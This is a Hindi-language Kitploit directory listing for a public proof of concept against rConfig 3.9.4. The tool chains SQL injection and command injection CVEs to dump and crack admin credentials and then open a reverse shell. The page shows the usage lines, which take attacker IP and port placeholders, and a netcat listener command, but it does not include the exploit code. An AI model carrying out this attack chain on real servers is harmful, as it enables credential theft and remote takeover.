Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
rConfig_rce — rConfig के लिए संयुक्त PoCs: SQL Injection (CVE-2020-10220) & Command Injection (CVE-2020-10879) | Kitploit
उपकरण/GitHubGitHub/cspanias/rconfig_rce
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubcspanias/rconfig_rce

rConfig_rce

rConfig के लिए संयुक्त PoCs: SQL Injection (CVE-2020-10220) & Command Injection (CVE-2020-10879)

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

rConfig 3.9 संयुक्त SQL इंजेक्शन और कमांड इंजेक्शन PoC

अवलोकन

यह PoC rConfig संस्करण 3.9.4 को लक्षित करता है और SQL इंजेक्शन और रिमोट कमांड इंजेक्शन कमजोरियों के संयोजन के माध्यम से शोषण प्रदर्शित करता है। यह निम्नलिखित प्रक्रिया को स्वचालित करता है:

  1. SQLi के माध्यम से डेटाबेस का नाम निकालना
  2. डेटाबेस से उपयोगकर्ता क्रेडेंशियल डंप करना
  3. hashcat का उपयोग करके rockyou शब्दसूची और best64.rules के साथ पासवर्ड हैश को क्रैक करने का प्रयास
  4. वैकल्पिक रूप से, क्रैक किए गए एडमिन क्रेडेंशियल का उपयोग करके खोज कार्यक्षमता पर कमांड इंजेक्शन के माध्यम से रिमोट कमांड निष्पादन (RCE) करना

यह स्क्रिप्ट दो मूल PoCs पर आधारित है और उन्हें जोड़ती है:

  • 48208.py (SQL इंजेक्शन) vikingfr द्वारा
  • 48241.py (कमांड इंजेक्शन) Matthew Aberegg और Michael Burkey द्वारा

इसे क्रैकिंग और वैकल्पिक शेल स्पॉनिंग को स्वचालित करने के लिए संशोधित किया गया था।

आवश्यकताएँ

  • Python 3
  • requests लाइब्रेरी (pip install requests)
  • hashcat स्थापित और कमांड लाइन के माध्यम से सुलभ
  • rockyou.txt शब्दसूची (या समतुल्य) जो /usr/share/wordlists/rockyou.txt पर स्थित है
  • hashcat नियम फ़ाइल /usr/share/hashcat/rules/best64.rule

उपयोग

केवल उपयोगकर्ताओं और हैश डंप करने के लिए:

root@kitploit:~
python3 rConfig_rce.py https://target

उपयोगकर्ताओं को डंप करने, पासवर्ड क्रैक करने, और RCE का प्रयास करने के लिए (रिवर्स शेल के लिए हमलावर IP और पोर्ट की आवश्यकता है):

root@kitploit:~
python3 rConfig_rce.py https://target attacker_ip attacker_port

नोट्स

  • यदि hashcat पासवर्ड क्रैक करने में विफल रहता है, तो स्क्रिप्ट CrackStation जैसी ऑनलाइन क्रैकिंग सेवाओं का उपयोग करने का सुझाव देती है।
  • यदि पासवर्ड हैश स्वचालित रूप से क्रैक नहीं किया जा सकता है, तो आपको RCE प्रयासों के लिए मैन्युअल रूप से सादा टेक्स्ट पासवर्ड इनपुट करने के लिए कहा जाएगा।
  • स्क्रिप्ट कमांड इंजेक्शन चरण के लिए admin खाते का उपयोग करने को प्राथमिकता देती है।
  • सुनिश्चित करें कि रिवर्स शेल को पकड़ने के लिए आपकी हमलावर मशीन पर एक लिसनर (जैसे, nc -lvnp 80) चल रहा है।

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध और अनैतिक है।

टूल डाउनलोड करें